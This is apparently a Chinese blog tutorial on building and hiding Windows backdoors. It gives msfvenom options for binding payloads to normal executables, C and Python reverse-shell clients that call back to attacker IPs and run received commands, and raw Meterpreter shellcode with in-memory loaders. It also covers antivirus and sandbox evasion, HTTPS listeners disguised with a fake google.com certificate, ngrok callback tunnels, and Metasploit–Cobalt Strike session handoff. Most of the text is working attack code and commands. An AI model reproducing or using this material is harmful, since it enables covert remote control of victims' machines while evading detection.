一.payload生成
msf:
- –p (- -payload-options)
添加载荷payload。 - –l
查看所有payload encoder nops。 - –f (- -help-formats)
输出文件格式。 - –e
编码免杀。 - –a (- -platform – -help-platforms)
选择架构平台
x86 | x64 | x86_64 - –o
文件输出。 - –s
生成payload的最大长度,就是文件大小。 - –b
避免使用的字符 例如:不使用 ‘\0f’。 - –i
编码次数。 - –c
添加自己的shellcode。 - –x | -k
捆绑。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。推荐用back door factory工具,但最好会汇编
msf可以写自动化脚本.rc,类似.bat和.sh,把想执行的任务写完,通过钉钉推送机器上线的信息
msf:
用法: msf -r xxx.rc
dingding.rc:
load session_notifier
set_session_dingtalk_webhook https://oapi.dingtalk.com/robot/send?
access_token=xxx
start_session_notifier
test.rc
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.xxx.xxx
exploit
二.shellcode的基本原理-socket编程
C:
#include <WinSock2.h>
#include <stdio.h>
#include <tchar.h>
#include <string.h>
#define SERVER_PORT 3333 //服务器端口号
#define BUFF_SIZE 1024
#pragma comment(lib, "WS2_32.lib")
int _tmain(int argc, _TCHAR* argv[])
{
//加载套接字库
WORD wVersionRequested;
WSAData wsaData;
int err;
printf("This is a Client side application!\n");
wVersionRequested = MAKEWORD(2, 2);
err = WSAStartup(wVersionRequested, &wsaData);
if(err != 0) {
//Tell the user that we could not find a usable WinSock Dll.
printf("WSAStartup() called failed!\n");
return -1;
} else {
printf("WSAStartup called successful!\n");
}
if(LOBYTE(wsaData.wVersion) != 2 || HIBYTE(wsaData.wVersion) != 2) {
//Tell the user that we could not find a usable WinSock Dll.
WSACleanup();
return -1;
}
//The WinSock Dll is acceptable. Proceed
//创建套接字
SOCKET sockClient = socket(AF_INET, SOCK_STREAM, 0);
if(sockClient == INVALID_SOCKET) {
printf("socket() called failed!, error code is %d\n",WSAGetLastError());
return -1;
} else {
printf("socket() called successful!\n");
}
//需要连接的服务端套接字结构信息
SOCKADDR_IN addrServer;
//设定服务器IP
addrServer.sin_addr.S_un.S_addr = inet_addr("192.168.199.129");
addrServer.sin_family = AF_INET;
//设定服务器的端口号(使用网络字节序)
addrServer.sin_port = htons(SERVER_PORT);
//向服务器发出连接请求
err = connect(sockClient, (SOCKADDR*)&addrServer, sizeof(SOCKADDR));
if(err == SOCKET_ERROR) {
printf("connect() called failed! The error code is %d\n",WSAGetLastError());
} else {
printf("connect() called successful\n");
}
while (true)
{
//接收数据
char recvBuf[BUFF_SIZE] = {0};
recv(sockClient, recvBuf, 100, 0);
printf("receive data from server side is: %s\n", recvBuf);
//执行命令
FILE *fp;
char buf[255] = {0};
if ((fp = _popen(recvBuf, "r")) == NULL)
{
perror("Fail to popen\n");
exit(1);
}
while (fgets(buf, 255, fp) != NULL)
{
send(sockClient, buf, strlen(buf)+1, 0);
}
_pclose(fp);
/*
char buf[] = "result ->>> %s",c;
send(sockClient, buf, strlen(buf)+1, 0);*/
}
//关闭套接字
closesocket(sockClient);
//终止套接字库的使用
WSACleanup();
system("pause");
return 0;
}
Python:
import socket
#socket库导入
import subprocess
#执行cmd命令并输出的一个功能
import time
def connectHost(ht,pt):
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#新建一个socket对象,af_inet表示ipv4,stream表示tcp//sock_rawname手动添加协议名称
#inet6表示ipv6sock_dgram表示udp
sock.connect((ht,int(pt)))#satger
#连接里面的括号需要用元组()来设置IP地址和端口端口号用整数表示
#到这一步连接就完成了
while True:
#死循环:一直保持连接
data=sock.recv(1024)
#设置可以接受的数据量bit单位010101收到的数据赋值给一个变量data
data=data.decode('utf-8')
#data变量他是byte类型,需要解码才能使用
screenData=subprocess.Popen(data,shell=True,stdout=subprocess.PIPE,stderr=subprocess.STDOUT)#stage
#subprocess最后完成的内容是一个文件对象
#data:我们输入的命令,shell:1.识别计算机的操作系统|2.根据操作系统自动调用命令行
#文件的处理流程:打开文件,编辑文件,关闭文件
while True:
#不知道到底有多少行就直接用while循环来做每一行的处理
line=screenData.stdout.readline()
#一行一行地去读取文件内容
m_stdout=line.decode('gbk')
#解码
print(m_stdout)
if line==b'':
#如果一行文本什么都没有
screenData.stdout.close()
break
#跳出文件处理的循环但是不是推出链接
sock.send(line.decode('gbk').encode('utf-8'))
#发送数据send和recv都是支支持byte类型
time.sleep(1)
sock.close()
def main():
host='192.168.199.172'
#IP地址是字符串
port='4444'
三、shellcode的加载方式
C:
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
//windows控制台程序不出黑窗口
unsigned char buf[] =
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"
"\x48\x31\xd2\x51\x65\x48\x8b\x52\x60\x56\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x0f\xb7\x4a\x4a\x48\x8b\x72\x50\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b"
"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x44"
"\x8b\x40\x20\x49\x01\xd0\x8b\x48\x18\xe3\x56\x4d\x31\xc9\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x48\x31\xc0\x41\xc1\xc9"
"\x0d\xac\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45"
"\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b"
"\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x41\x58"
"\x48\x01\xd0\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48"
"\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
"\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00"
"\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"
"\x49\xbc\x02\x00\x11\x5c\xc0\xa8\xc7\x9c\x41\x54\x49\x89\xe4"
"\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68"
"\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a"
"\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"
"\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5"
"\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba"
"\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5"
"\xe8\x93\x00\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"
"\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5"
"\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41"
"\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41"
"\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8"
"\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68\x00\x40"
"\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5"
"\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"
"\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41"
"\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5\xa2\x56\xff\xd5";
int main()
{
((void(*)(void)) & buf)();
}
python:
import ctypes
import base64
shellcode = b""
shellcode += b"\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b"
shellcode += b"\x52\x30\x8b\x52\x0c\x8b\x52\x14\x31\xff\x8b\x72\x28"
shellcode += b"\x0f\xb7\x4a\x26\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20"
shellcode += b"\xc1\xcf\x0d\x01\xc7\x49\x75\xef\x52\x57\x8b\x52\x10"
shellcode += b"\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4c\x01"
shellcode += b"\xd0\x8b\x58\x20\x50\x01\xd3\x8b\x48\x18\x85\xc9\x74"
shellcode += b"\x3c\x49\x31\xff\x8b\x34\x8b\x01\xd6\x31\xc0\xac\xc1"
shellcode += b"\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d"
shellcode += b"\x24\x75\xe0\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b"
shellcode += b"\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
shellcode += b"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b"
shellcode += b"\x12\xe9\x80\xff\xff\xff\x5d\x68\x33\x32\x00\x00\x68"
shellcode += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8\xff"
shellcode += b"\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80"
shellcode += b"\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\xc7\x81\x68\x02"
shellcode += b"\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
shellcode += b"\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68"
shellcode += b"\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08"
shellcode += b"\x75\xec\xe8\x67\x00\x00\x00\x6a\x00\x6a\x04\x56\x57"
shellcode += b"\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b"
shellcode += b"\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58"
shellcode += b"\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68"
shellcode += b"\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68"
shellcode += b"\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff"
shellcode += b"\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c"
shellcode += b"\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01"
shellcode += b"\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00"
shellcode += b"\x53\xff\xd5"
shellcode = bytearray(shellcode)
# 设置VirtualAlloc返回类型为ctypes.c_uint64
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_int
# 申请内存
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
# 放入shellcode
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),buf,ctypes.c_int(len(shellcode)))
# 创建一个线程从shellcode防止位置首地址开始执行
handle = ctypes.windll.kernel32.CreateThread(
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0))
)
# 等待上面创建的线程运行完
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),
ctypes.c_int(-1))
四.c++下其他的常见加载shellcode的方式
1.使用已经有的kernel32加载
2.使用堆加载
3.使用内联汇编加载
https://paper.seebug.org/1413/#createthreadpoolwait
https://github.com/knownsec/shellcodeloader
五.杀毒软件的基本原理
杀毒软件的基本等级
1.无害
没有任何可疑行为,没有任何特征符合病毒
2.可疑
存在可疑行为:操作注册表,打开powershell,修改用户,操作敏感文件等
3.确认病毒
特征符合病毒
杀毒软件的常用识别方式
1.静态
通常通过反编译的方式查看源代码
1.1 代码中存在的函数
virtualalloc,rtlmovememory,ntcreatthread等
主要都是windowsapi函数,尤其是和内存、堆、线程相关的函数
当然在python中如果存在“cmd”等关键词也是会被识别的:比如subprocess.popen(“cmd /c”)可以改
为subprocess.popen(“命令”)
1.2 shellcode特征
以msf举例,杀毒软件最常用的就是判断 mov r10d, 0x0726774C ; hash( “kernel32.dll”,
“LoadLibraryA” )这一部分的代码来识别,通常汇编层级下的代码要深入识别查杀对杀毒软件来说有一定
误判的风险,所以一般的杀毒引擎都是通过shellcode中的特征码来识别,比如这一句代码可以用syscall
代替试试(也就是直接纯手动找函数偏移而不是直接hash去找)
每个杀毒软件可能找的地方都不一样,推荐使用myccl+ida详细找一下具体查杀的哪个位置
1.3 文件名称或md5
不多介绍,看标题就懂。
1.4 加密(可疑)
使用加密解密行为或者对文件有额外保护措施
2.动态
通常这一步都是静态分析之后做的,部分杀毒软件会有沙盒
沙盒:也叫启发式查杀,通过模拟计算机的环境执行目标文件再观察特征行为
沙盒模拟的常见特征:
内存较小-》不影响计算机正常运行
时间较快-》沙盒内置的时间速度比现实世界要快,提高查杀速度
进程或文件不完整-》减少杀毒软件运行时对计算机的消耗:aaaaaaaaaaaaaaaaaaa.dll
io设备缺失-》鼠标键盘等事件大部分沙盒都没有
如何思考:真实的计算机和一个沙盒的计算机他们有什么不同
六、msf使用https监听
1.证书生成
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
-subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com" \
-keyout www.google.com.key \
-out www.google.com.crt && \
cat www.google.com.key www.google.com.crt > www.google.com.pem && \
rm -f www.google.com.key www.google.com.crt
2.生成https的payload
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.199.156 lport=4444 PayloadUUIDTracking=true HandlerSSLCert=server.pem PayloadUUIDName=qqy -f exe -o payload.exe
3,监听设置
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 你的ip
set lport 你的端口
set handlersslcert ssl证书地址
exploit -j
3.msf使用ngrock前置
3.1 sunny-ngrock官网注册登录
3.2 选择通道(推荐付费)
3.3 下载客户端
3.4 生成通道
./sunny clientid 你的clientid
3.5 生成ngrock的payload
msfvenom -p windows/meterpreter/reverse_tcp lhost=5gzvip.idcfengye.com lport=10040 -f exe -o ngrock_payload.exe
lhost为你在ngrock上申请的地址和lport的端口
3.6 生成ngrock的监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 5555
exploit -j
./sunny clientid 你的clientid
msfvenom -p windows/meterpreter/reverse_tcp lhost=5gzvip.idcfengye.com
lport=10040 -f exe -o ngrock_payload.exe
cs痕迹隐藏
1.改端口
2.换证书
3.绕过流量审计
MSF转CS
当我们的已经获得 meterpreter的时候转到CS只需要使用的payload_inject模块
meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/handler) > use exploit/windows/local/payload_inject
msf exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf exploit(windows/local/payload_inject) > set lhost 192.168.59.132
lhost => 192.168.59.132
msf exploit(windows/local/payload_inject) > set lport 5555
lport => 5555
msf exploit(windows/local/payload_inject) > set session 1
session => 1
msf exploit(windows/local/payload_inject) > set disablepayloadhandler true
disablepayloadhandler => true
msf exploit(windows/local/payload_inject) > exploit -j
set disablepayloadhandler true 用来禁用 payload handler的监听否则有冲突。
然后在CS里面配置监听set lhost 192.168.59.132 set lport 5555 即可
CS转MSF
只需要用到 spawn 功能
目标右键> spawn
添加一个 Foreign 的监听器 在点choose 来到msf
msf > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows ADMIN-C199053CD\Administrator @ ADMIN-C199053CD 192.168.59.132:4444 -> 192.168.59.129:1035 (192.168.59.129)
msf > use exploit/multi/handler
msf exploit(multi/handler) > set set payload windows/meterpreter/reverse_http
set => payload windows/meterpreter/reverse_http
msf exploit(multi/handler) > set lhost 192.168.59.132
lhost => 192.168.59.132
msf exploit(multi/handler) > set lport 7788
lport => 7788
msf exploit(multi/handler) > exploit
[*] Started HTTP reverse handler on http://192.168.59.132:7788
[*] http://192.168.59.132:7788 handling request from 192.168.59.129; (UUID: qwqc9zgv) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 2 opened (192.168.59.132:7788 -> 192.168.59.129:1086) at 2019-04-05 13:39:34 +0800
521
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
